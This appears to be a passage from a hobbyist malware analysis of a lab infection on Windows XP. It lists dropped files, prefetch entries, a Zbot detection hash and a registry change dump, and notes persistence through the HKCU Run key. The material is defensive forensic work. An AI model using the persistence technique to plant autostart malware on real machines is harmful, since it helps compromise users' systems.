C:\Documents and Settings\bomber\Local Settings\Temp\au-descriptor-1.6.0_35-b10.xml 8KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temp\V.class 7KB A 9/22/2012 12:34:03 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wgsdgsdgdsgsd.exe 289KB A 9/22/2012 12:34:06 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123113_a02096 1,026KB A 9/22/2012 12:32:07 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123320_a03904 1,999KB A 9/22/2012 12:34:30 PM
C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 66KB A 9/22/2012 12:31:18 PM
C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424 66KB A 9/22/2012 12:33:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\de[1].png 1KB A 9/22/2012 12:28:41 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\domainmap[3].gif 1KB A 9/22/2012 12:30:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[1].htm 1KB A 9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[2].htm 1KB A 9/22/2012 12:34:02 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\login[2].htm 12KB A 9/22/2012 12:28:37 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\ro[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA5PUYED 2KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA704DOF 2KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEF3BT4 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEOTJ4L 2KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAVO38L3 2KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\screenshot[2].jpg 37KB A 9/22/2012 12:30:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA0Y1H1G 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA2KHYDQ 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA6GXH8C 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\search[1].htm 76KB A 9/22/2012 12:30:16 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\CAKLU50N.HTM 1KB A 9/22/2012 12:34:00 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\dnsd[1].css 4KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\help_16[1] 4KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\qsonhs[1].aspx 1KB A 9/22/2012 12:28:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\redir_not_found[1].htm 6KB A 9/22/2012 12:29:18 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\report[1].htm 111KB A 9/22/2012 12:30:56 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA0R10DS 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA9YH18O 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCAVXGZO1 2KB A 9/22/2012 12:30:09 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA6QGIGC 1KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA9XHX7I 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAAK6LMZ 1KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAB0WC2R 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAVTOWF0 1KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAYG9PUT 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\tabswelcome[1] 15KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\close_nor[1] 3KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\collapse_nor[1] 3KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\expand_nor[1] 3KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\google_com[1].htm 109KB A 9/22/2012 12:30:02 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\main[1].htm 93KB A 9/22/2012 12:33:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\NewTabPageScripts[2] 4KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\report[2].htm 507KB A 9/22/2012 12:30:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCA3FAUVH 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCABOLW00 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCANL4B03 2KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2HS76W 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2PPY3O 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCAGLGZBP 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[10] 2KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[11] 2KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\ua[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\urlquery_net[1].htm 41KB A 9/22/2012 12:28:40 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\728x90-1[1].gif 76KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\banner-fade[1].gif 2KB A 9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\domainmap[1].gif 34KB A 9/22/2012 12:30:30 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\home[1].aspx 57KB A 9/22/2012 12:33:47 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\il[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\jp[1].png 1KB A 9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCA9X3PTW 2KB A 9/22/2012 12:30:13 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCAVC54LS 2KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\screenshot[2].jpg 160KB A 9/22/2012 12:30:30 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAOZA5VK 1KB A 9/22/2012 12:30:13 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAQVDE8Y 1KB A 9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAUMFERF 1KB A 9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[10] 1KB A 9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[11] 1KB A 9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\top[1] 9KB A 9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\My Documents\pcap.pcapng 1,026KB A 9/22/2012 12:32:14 PM
C:\WINDOWS\Sun 1KB D
C:\WINDOWS\Sun\Java 1KB D
C:\WINDOWS\Sun\Java\Deployment 1KB D
C:\WINDOWS\Prefetch\DUMPCAP.EXE-241FFA5D.pf 37KB A 9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\JAVA.EXE-0C263507.pf 71KB A 9/22/2012 12:34:01 PM
C:\WINDOWS\Prefetch\JAVAWS.EXE-021AC9A9.pf 12KB A 9/22/2012 12:30:19 PM
C:\WINDOWS\Prefetch\JUCHECK.EXE-1B0E4D0A.pf 33KB A 9/22/2012 12:30:19 PM
C:\WINDOWS\Prefetch\MYZYN.EXE-02389B08.pf 18KB A 9/22/2012 12:31:41 PM
C:\WINDOWS\Prefetch\RUNDLL32.EXE-1EDA2CF6.pf 22KB A 9/22/2012 12:31:47 PM
C:\WINDOWS\Prefetch\SETUP_WM.EXE-3135CBD6.pf 34KB A 9/22/2012 12:33:43 PM
C:\WINDOWS\Prefetch\WGSDGSDGDSGSD.EXE-058972B5.pf 20KB A 9/22/2012 12:34:17 PM
C:\WINDOWS\Prefetch\WIRESHARK.EXE-0525E272.pf 53KB A 9/22/2012 12:28:58 PM
C:\WINDOWS\Prefetch\WMPLAYER.EXE-18DDEF9C.pf 59KB A 9/22/2012 12:34:04 PM
C:\WINDOWS\system32\d3d9caps.dat 1KB A 9/22/2012 12:33:59 PM
C:\WINDOWS\system32\wmpns.dll 222KB A 4/14/2008 8:00:00 AM

The cookies were not created as part of the infection. One was from MSN.com (opens by default in Windows XP), one was from URLquery.net, one by a redirected site which was my first attempt at infection and the other was unrelated.

The files C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 and C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424 were in "use" once the system was compromised, indicating it was being used by the application.These files are created by java's temporary needs and I have seen them on quite a few systems that were infected. More often, however, I have seen the folder hsperfdata_%username% empty post infection.

myzyn.exe is recognized as PWS-Zbot.


SHA256:0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199
File name:myzyn.exe
Detection ratio:28 / 43
Analysis date:2012-09-22 17:42:05 UTC ( 43 minutes ago )



Now Onto the Registry

Persistence was established through HKCU\Software\Microsoft\Windows\CurrentVersion\Run, nothing special here.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOrimdie""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""

Here is the full dump of the registry changes, which admittedly is contaminated by some Windows XP legitimate activity surrounding these first launch of some programs like Windows Media Player and my download of Java from oldversion.com - which was unexpected.. I will use the lessons learned here in future studies.




backhole1 - Registry

Key Value Data Before Data After
HKEY_CLASSES_ROOT\WMP.DeskBand
HKEY_CLASSES_ROOT\WMP.DeskBand @ "Windows Media Player"
HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID
HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID @ "{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_CLASSES_ROOT\WMP.DeskBand.1
HKEY_CLASSES_ROOT\WMP.DeskBand.1 @ "Windows Media Player"
HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID
HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID @ "{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9} @ "Windows Media Player"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32 @ "C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32 ThreadingModel "Apartment"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID @ "WMP.DeskBand.1"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID @ "WMP.DeskBand"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52} @ "IWMPDeskBand"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid @ "{00020424-0000-0000-C000-000000000046}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32 @ "{00020424-0000-0000-C000-000000000046}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib @ "{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib Version "1.0"
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer CLSID "{cd3afa96-b84f-48f0-9393-7edc34128127}"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0 @ "WMPDeskBand 1.0 Type Library"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32 @ "C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS @ "0"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR @ "C:\PROGRA~1\WINDOW~2\"
HKEY_CURRENT_USER\Identities Identity Ordinal dword:00000001 dword:00000002
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857} Identity Ordinal dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 VerStamp dword:00000000 dword:00000003
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpellDontIgnoreDBCS dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 MSIMN dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 StoreMigratedV5 dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 ConvertedToDBX dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Settings Upgraded dword:00000007
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Running dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Store Root hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpoolerDlgPos hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpoolerTack dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Compact Check Count dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Welcome Message dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Accounts Checked hex:00,00,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Safe Attachments dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Secure Safe Attachments dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Default_CodePage dword:00006faf
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News Accounts Checked hex:00,00,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29 BalloonShown dword:00000001
HKEY_CURRENT_USER\Software\JavaSoft\Java Update
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy LastUpdateBeginTime "Sat, 22 Sep 2012 16:30:08 GMT"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy LastUpdateFinishTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy VersionXmlURL "http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX UpdateSchedule dword:00000011
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX UpdateScheduleMinutes dword:0000001a
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX Frequency dword:00000020
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX LastUpdateInvokedTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication Name "java.exe"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager Server ID dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager Default LDAP Account "Active Directory GC"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts PreConfigVer dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts PreConfigVerNTDS dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts ConnectionSettingsMigrated dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts AssociatedID hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server ID dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC Account Name "Active Directory"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Authentication dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Simple Search dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Bind DN dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Port dword:00000cc4
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Resolve Flag dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Secure Connection dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP User Name "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Base "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server ID dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot Account Name "Bigfoot Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server "ldap.bigfoot.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP URL "http://www.bigfoot.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Authentication dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Simple Search dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server ID dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign Account Name "VeriSign Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server "directory.verisign.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP URL "http://www.verisign.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Authentication dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Base "NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Simple Search dword:00000001
